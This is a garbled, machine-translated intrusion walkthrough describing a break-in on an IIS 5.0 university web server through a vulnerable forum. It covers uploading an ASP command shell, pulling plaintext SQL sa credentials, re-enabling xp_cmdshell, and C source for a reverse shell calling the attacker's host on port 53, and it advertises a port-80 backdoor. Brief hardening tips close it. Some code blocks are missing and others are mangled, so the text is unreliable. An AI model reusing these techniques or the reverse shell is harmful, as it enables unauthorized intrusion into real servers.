Security problem of Web server built in intranet

Many companies or businesses put their Web servers in the intranet and map them on the firewall, turning requests from port 80 to a Web port on the intranet Web server.

This security is improved a lot, but does not mean that the Web server hidden in the intranet must be safe, because the Web server itself is still a lot of problems, especially some CG, programs, often this is the easiest place for people to overlook. The following is an open 80-port Web server For example, to test the existence of security problems, and the existence of problems to do a test description, pointed out the crux of the problem and the prevention of wrong application.

This is a university's entertainment and Leisure website, went in to look, the page did a good job, first look at what is a Web server it.

D:\NE-VV www.target.com 80

DNS Fwd/rev Mismatch:www.target.com!=traget

WWW.TARGET.COM[192.168.0.1]80 (HTTP) Open

gep/http/1.0

HOST:www.target.com

http/1.1 OK

server:microsoft-iis/5.0

Content-location:http://www.target.com/index.asp

DATE:THU,22 May 2003 12:13:32 GMT

Content-type:text/html

......

It's IIS5.0 to see if it can spill directly. Try the latest IIS WebDAV overflow. Personal feeling Isno write that overflow more useful, but because it is in the intranet, this tool causes overflow will be directly in the 7788 port binding a cmd, which for our invasion is certainly not. So, I modified it so that it can be reversed, but ultimately not, it seems that the other side is patched.

Another stroll around the other suites, see a BBS, is moving the network forum and the version is still relatively low (5.00320). Yes, this is often our breakthrough (the first big failure). A long time ago, my friend Pskey and I had found that a cookie variable did not filter the vulnerability, and he wrote a exploit (program on the CD). Through this vulnerability, I am free to change the user password of any user (including the master moderator). I use this ID in, into the background management, modify settings, allow the upload exe, ASP and other documents. To see if there is no disabled FSO, the result is not disabled (the second failure). I uploaded a aspcmdshell through it. This aspcmdshell allows me to execute commands on the Web server as a user of Guests group permissions, and, of course, it does not throw away the guests group's access to%systemroot%\winnt\cdm.exe. Try "dir c:\" to see if it does not prohibit the operation (the third major failure). In fact, if it prohibits the cmd.exe of the operation of the Authority does not matter, we can upload a go up, and then change this aspcmdshell on it. With this Aspcmdshell, we can do a lot of things. Of course it's not enough, my goal is to get the highest authority. At this point I am ready to elevate the privilege. First look at the administrator gave the Guests group which permissions, look at the return of ipconfig results:

Windows IP Configuration

Ethernet Adapter Local Area Connection:

Connection-specific DNS Suffix.:

IP address ...: 192.168.1.222. ........

Subnet Mask ........: 255.255.255.0.

"Default Gateway ...: 192.168.1.1."

Yo, in the intranet, good, and then try C:\ can not write, the answer is not written (good). Try another catalog, the entire C. Disk is not writable, only gives the Web directory writable permissions. Take a look at what services are running and check with the Netstat-an command.

TCP 127.0.0.1:1433 0.0.0.0:0 listening yo! Also ran the MSSQL, good. The first thing to do is to see which programs use the MSSQL database. Then go to the home page, see a news system, most likely it is. With just that Aspcmdshell to check the news/directory inside the ASP program, see a lot of files in the first line, basically this is the database link program. Check this out:

Strconn= "Driver={sql erver};Dd Escription=sqldemo;

server=127.0.0.1; uid=sa;&

Pwd=hello;database=news

Set Conn=server.createobject ("Adodb.connection")

Conn.Open strconn

Really not what I expected (the fourth major failure, the MSSQL user name and password in the form of plaintext stored in the ASP file), got the MSSQL database password, but also sa user, the permissions are relatively large oh. Originally wanted to see if you can find the News system ASP program vulnerabilities, using the SQL injection. There seems to be no need at all now. Write yourself a can use MSSQL extended XP a Cmdshell to execute system commands of the ASP program, there may be the administrator to delete this extension, or directly delete the Xplog70.dll this file. Whatever it is, try it first. Write sql.asp content as follows:

First open the firewall, record the ICMP packets, and then execute in IE:

http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1

This ASP is through the Dynamic Network Forum upload program upload machine program settings upload files uploaded to Up1oad soil mages/This directory, according to the current time to rename the file, so the file name is 439587438739 ASP such a full number of components.

The firewall is not responding, Halo! It appears to have deleted the xp--cmdshei1 extension, or deleted the xp1og70 D11 file directly. If you don't delete xp1og70 D11 directly, and just delete the extension, I'll try to restore this extension. And then write an asp:

Upload it, then execute http://www.target.com/bbs/uploadimages/23456489432.asp.

Then submit the request again:

http://www.target.com/bbs/uploadimages/

439587438739.asp?cmd=ping%192.168.0.1

Oh, our firewall is responding. ICMP packets from www.target.com are logged. It seems that there is no problem, through this ASP we can execute a lot of commands (the fifth big failure), are system permissions, but not echo, not very perfect. So I want an interactive she1l. Write a reverse-attached program:

#include

#include

#pragma comment (lib.) Ws2_32 ")

void main (int argc,char*argv[])

{

Wsadata Wsadata;

SOCKET Hsocket;

Startupinfo si;

Process_information Pi;

struct sockaddr_in adik_sin;

memset (&adik_sin,0,sizeof (Adik_sin));

memset (&si,0,sizeof (SI));

Wsastartuup (Makeword (2,0), &wsadata);

Hsocket=wsasocket (Af_inet,

Sock_strema,null,null,null,null);

Adik_sin.sin_family=af_inet;

Adik_sin.sin_port=htons (53);//Connect to my host 53 port

ADIK_SIN.SIN_ADDR.S_ADDR=INET_ADDR ("192").

168.0.1://IP of my host

Connect (hsocket. ( struct sockaddr*)%adik_sin,

sizeof (Adik_sin);

Si.cb=sizeof (SI)

Si.dwflags-startf_usestdhandles;

Si.hstdlnput=si.hstdoutput=si.hstderror

= (void*) hsocket;

CreateProcess (NULL. " Cmd.exe ", NULL,

NULL,1,NULL,NULL,NULL,&SI.&PI);

ExitProcess (0);

}

Compile it into a.exe and upload it first on the local computer to listen for a port 53, and then execute in IE:

http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=d:\inetpub\wwwroot\bbs\uploadimages\3215645664654. Exe

D:\nc-1-P 53

Microsoft Windows 2000[version 5.00.2195]

All rights reserved 1985-2000microsoft Corp.:

D:\inetpub\wwwroot\bbs\uploadimages>ipconfig

Windows IP Configuration

Ethernet Adapter Local Area Connection:

Connection-specific DNS Suffix.:

IP address..............:192.168.1.222

Subnet mask.............:255.255.255.0

Default gateway.........:192.168.1.1

D:\inetpub\wwwroot\bbs\uploadimages>

Okay, so far, the intrusion is almost complete, and now we've got an interactive shell with system privileges, and we can "do whatever we want". This time we can install a back door, so that we do not need to be so difficult, I used to write "a us-backdoor." Allows us to "get an interactive shell through port 80, without affecting the IIS program itself." Normal operation.　　This backdoor can be downloaded on my home page. A few of the above failures so that each of us to avoid the invasion of people have gained more authority, in fact, a good administrator can completely avoid these. Therefore, a small ASP program error can cause your server to be cracker destroyed. Programmers, it's time to take a look at your program. For some of the major failures I mentioned earlier, I have a bit of a thread in managing "the Basics:

(1), do not use a very many of the known vulnerabilities of ASP programs, especially such as the lower version of the dynamic network, even if used, but also often to the official forum to see more information about the new vulnerabilities, timely patching or upgrade procedures.

(2), if there is no need to use the FSO, you can disable.

(3), with cscls%systemroot%\winnt\cmd.exe/e/d Guests command, prohibit the guests group of users access to Cmd.exe.

(4), as far as possible not to the password of the database in the form of clear text in the ASP program, you can use the form of data sources to connect the database.

(5), the general user should not be used to xp_crndshell this expansion, then it is best to delete xplog70.dll; try not to use SA as the user. Set the SA's password more complex, you can build another user, the right to the minimum.

Postscript

The site being attacked is not a bare metal that is exposed outside, but a service that is placed in the intranet through a firewall map. please contact the site, timely note your name. Contact Email: edu#chinaz.com (change # to @).